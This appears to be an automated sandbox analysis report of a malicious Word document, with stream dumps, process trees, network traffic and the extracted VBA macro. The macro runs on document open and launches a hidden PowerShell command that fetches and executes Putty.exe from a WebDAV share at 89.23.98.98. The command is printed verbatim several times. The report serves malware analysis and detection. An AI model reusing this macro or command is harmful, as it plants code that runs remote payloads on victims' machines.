                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . , c . . # . . . . . . . . . . . . . . . . . p . . . n T . X E I . " . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . ( 9 . O . k . . . . . . . . . . . . . . . . . . . . . . . x . . . . ( 9 . O . k . n T . X E I . " . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 9 . 0 . 6 . - . 0 . 0 . 0 . 0 . - . 0 . 0
                    Data Raw:01 16 03 00 03 00 01 00 00 e2 03 00 00 e4 00 00 00 10 02 00 00 10 04 00 00 1e 04 00 00 52 06 00 00 00 00 00 00 01 00 00 00 a8 2c 63 d2 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 6e 54 d3 87 9b b5 58 45 9d f7 49 f3 1b 22 dd d1 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Attribute VB_Name = "ThisDocument"
                    Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    Sub Document_Open()
                        Dim objShell As Object
                        Dim strCommand As String
                        
                        
                        Set objShell = CreateObject("WScript.Shell")
                        
                        
                        strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""
                        
                        
                        objShell.Run strCommand, 1, True
                        
                       
                        Set objShell = Nothing
                    End Sub
                    
                    
                    

                    General
                    Stream Path:PROJECT
                    CLSID:
                    File Type:ASCII text, with CRLF line terminators
                    Stream Size:420
                    Entropy:5.37577115575786
                    Base64 Encoded:True
                    Data ASCII:I D = " { E 1 7 0 0 2 5 E - A A D B - 4 A A 0 - B D A B - 2 8 2 5 2 B 3 7 B A 0 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D C D E 2 B 0 9 D B E 1 D F E 1 D F E 1 D F E 1 D F " . . D P B = " B 8 B A 4 F B 0 5 0 B 0 5 0 B 0 " . . G C = " 9 4 9 6 6 3 5 1 E 3 2 C E 4 2 C E 4 D 3 " . . . . [ H o s
                    Data Raw:49 44 3d 22 7b 45 31 37 30 30 32 35 45 2d 41 41 44 42 2d 34 41 41 30 2d 42 44 41 42 2d 32 38 32 35 32 42 33 37 42 41 30 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
                    General
                    Stream Path:PROJECTwm
                    CLSID:
                    File Type:data
                    Stream Size:71
                    Entropy:3.3485999524807437
                    Base64 Encoded:False
                    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
                    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
                    General
                    Stream Path:VBA/_VBA_PROJECT
                    CLSID:
                    File Type:data
                    Stream Size:2472
                    Entropy:3.970498286675828
                    Base64 Encoded:False
                    Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
                    Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                    General
                    Stream Path:VBA/__SRP_0
                    CLSID:
                    File Type:data
                    Stream Size:1589
                    Entropy:3.4573811374928995
                    Base64 Encoded:False
                    Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . H a N . f ( d + x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00
                    General
                    Stream Path:VBA/__SRP_1
                    CLSID:
                    File Type:data
                    Stream Size:182
                    Entropy:1.6862905000266526
                    Base64 Encoded:False
                    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                    General
                    Stream Path:VBA/__SRP_2
                    CLSID:
                    File Type:data
                    Stream Size:448
                    Entropy:2.093463369058467
                    Base64 Encoded:False
                    Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . ` . . . A . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . .
                    Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 91 07 00 00 00 00 00 00 00 00 00 00 c1 07 00 00 00 00 00 00 00 00 00 00 11 08
                    General
                    Stream Path:VBA/__SRP_3
                    CLSID:
                    File Type:data
                    Stream Size:156
                    Entropy:1.7820663630707385
                    Base64 Encoded:False
                    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 00 00 e1 0d 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                    General
                    Stream Path:VBA/dir
                    CLSID:
                    File Type:data
                    Stream Size:527
                    Entropy:6.260273730296486
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . . h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . E O f f i c E O . f . i . c E . . . E 2 D F . 8 D 0 4 C - 5 B . F A - 1 0 1 B - B D E 5 E A A C . 4 . 2 E g
                    Data Raw:01 0b b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 17 ef 10 68 0c 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                    TimestampSource PortDest PortSource IPDest IP
                    Oct 23, 2024 17:30:52.048788071 CEST4916380192.168.2.2289.23.98.98
                    Oct 23, 2024 17:30:52.054563999 CEST804916389.23.98.98192.168.2.22
                    Oct 23, 2024 17:30:52.054683924 CEST4916380192.168.2.2289.23.98.98
                    Oct 23, 2024 17:30:52.055025101 CEST4916380192.168.2.2289.23.98.98
                    Oct 23, 2024 17:30:52.060640097 CEST804916389.23.98.98192.168.2.22
                    Oct 23, 2024 17:30:52.196660042 CEST4916380192.168.2.2289.23.98.98
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.224916389.23.98.98803616C:\Windows\explorer.exe
                    TimestampBytes transferredDirectionData
                    Oct 23, 2024 17:30:52.055025101 CEST100OUTOPTIONS / HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: DavClnt
                    translate: f
                    Host: 89.23.98.98


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:11:30:43
                    Start date:23/10/2024
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13f9a0000
                    File size:1'423'704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:11:30:45
                    Start date:23/10/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"
                    Imagebase:0x13f380000
                    File size:443'392 bytes
                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:4
                    Start time:11:30:48
                    Start date:23/10/2024
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\explorer.exe" \\89.23.98.98@80\file\
                    Imagebase:0xff2f0000
                    File size:3'229'696 bytes
                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:11:30:51
                    Start date:23/10/2024
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:explorer.exe
                    Imagebase:0xff2f0000
                    File size:3'229'696 bytes
                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Call Graph

                    • Entrypoint
                    • Decryption Function
                    • Executed
                    • Not Executed
                    • Show Help
                    callgraph 2 fwfashj 12 Document_Open Run:1,CreateObject:1

                    Module: NewMacros

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "NewMacros"

                    LineInstructionMeta Information
                    2

                    Sub fwfashj()

                    8

                    End Sub

                    Module: ThisDocument

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "ThisDocument"

                    2

                    Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    APIsMeta Information

                    CreateObject

                    CreateObject("WScript.Shell")

                    Run

                    IWshShell3.Run("powershell.exe -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"",1,True) -> 1
                    StringsDecrypted Strings
                    "WScript.Shell"
                    "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""
                    LineInstructionMeta Information
                    9

                    Sub Document_Open()

                    10

                    Dim objShell as Object

                    executed
                    11

                    Dim strCommand as String

                    14

                    Set objShell = CreateObject("WScript.Shell")

                    CreateObject("WScript.Shell")

                    executed
                    17

                    strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""

                    20

                    objShell.Run strCommand, 1, True

                    IWshShell3.Run("powershell.exe -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"",1,True) -> 1

                    executed
                    23

                    Set objShell = Nothing

                    24

                    End Sub

                    Reset < >
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.393910031.000007FE89DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89DD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7fe89dd0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0cD
                      • API String ID: 0-191860258
                      • Opcode ID: 4507c2df1d503313e302b95947f3bb1155a62c78699836ec65d4f17ee0056180
                      • Instruction ID: d02d79954762f7b48b7361316419c527af6951c7d897884f8c32a2203f152bdf
                      • Opcode Fuzzy Hash: 4507c2df1d503313e302b95947f3bb1155a62c78699836ec65d4f17ee0056180
                      • Instruction Fuzzy Hash: E4D1183090E7C91FE757972858146A97FA4EF97360F0901EBD48DCB1E3D618AC1AC3A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.393910031.000007FE89DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89DD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7fe89dd0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xh$`k?$h.B$h.B
                      • API String ID: 0-2620180523
                      • Opcode ID: 142292e01dbeed142f010f5afec9e424fb2c2f898741e0f6decfc73fb7a7579c
                      • Instruction ID: b0003a2858bb10165a99ca1475cc2e8aaf6326c12edf17f2cb7d7c626179613a
                      • Opcode Fuzzy Hash: 142292e01dbeed142f010f5afec9e424fb2c2f898741e0f6decfc73fb7a7579c
                      • Instruction Fuzzy Hash: E481F42150E7C60FE75397B858246A67FF1DF47214B1E01EBC48ACB1E3CA19AC5AC362
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.393910031.000007FE89DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89DD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7fe89dd0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xh$h.B$h.B$h.B$h.B$h.B$h.B
                      • API String ID: 0-1704855422
                      • Opcode ID: 91fded6d4e0974fe327f10ae78e4bf8a3d83b11d6cc0d23dd492b5be8d5cab7b
                      • Instruction ID: 96035d62d7950dd6f7a871df1ce6a8c882019bd5b9058bf236db57adb0ee5e92
                      • Opcode Fuzzy Hash: 91fded6d4e0974fe327f10ae78e4bf8a3d83b11d6cc0d23dd492b5be8d5cab7b
                      • Instruction Fuzzy Hash: 00510722A0DA864FFB47A72C64103797FA2EF96348F2901E7D04ED71E3DA19AC15C355